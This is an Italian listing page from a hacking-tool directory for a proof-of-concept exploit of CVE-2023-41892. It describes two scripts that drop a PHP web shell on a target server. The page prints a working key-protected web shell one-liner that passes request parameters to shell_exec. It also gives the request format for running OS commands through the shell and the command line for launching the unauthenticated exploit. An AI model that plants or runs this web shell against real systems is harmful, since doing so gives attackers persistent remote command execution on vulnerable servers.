Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-41892_poc — Personalizzato per il mio uso. | Kitploit
Strumenti/GitHubGitHub/user01-1/cve-2023-41892_poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitShellcodeSfruttamento di Applicazioni WebCommand and Control
GitHubuser01-1/cve-2023-41892_poc

CVE-2023-41892_poc

Personalizzato per il mio uso.

Vedi Repository
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-41892_poc

Personalizzato per uso personale

poc_noauth.py

  • Web shell PHP one-line di base
  • Esecuzione di comandi OS tramite ?cmd=<comando>

poc_auth.py

  • Web shell con semplice autenticazione basata su chiave (confronto hash SHA-256)
  • Richiede l'inserimento della chiave corretta per eseguire comandi
  • Modifica del codice necessaria:
    • Nella variabile webshell all'interno della funzione drop_payload, sostituire YOUR_SECRET_KEY con il valore SHA-256 hash della chiave desiderata
  • Modalità d'uso:
    1. Sostituire YOUR_SECRET_KEY in webshell con l'hash SHA-256 della chiave in chiaro
    2. Nella richiesta, inviare la chiave in chiaro
      root@kitploit:~
      {target}/shell.php?k=<chiave_in_chiaro>&c=<comando>
      
Scarica lo strumento
  • Esempio:
    1. Impostazione: chiave in chiaro = test1234
    2. Calcolare l'hash SHA256 tramite cyberchef o simili: 937e8d5fbb48bd4949536cd65b8d35c426b80d2f830c5c308e2cdec422ae2244
      • echo -n test1234 | sha256sum
      • cyberchef, ecc.
    3. Modifica del codice:
      root@kitploit:~
      webshell = """<?php const K='937e8d5fbb48bd4949536cd65b8d35c426b80d2f830c5c308e2cdec422ae2244';if(hash('sha256',$_GET['k']??'')!==K)die; if(isset($_GET['c']))echo'<pre>'.shell_exec($_GET['c']); ?>"""
      
  • Modalità d'uso

    python poc_noauth.py {target}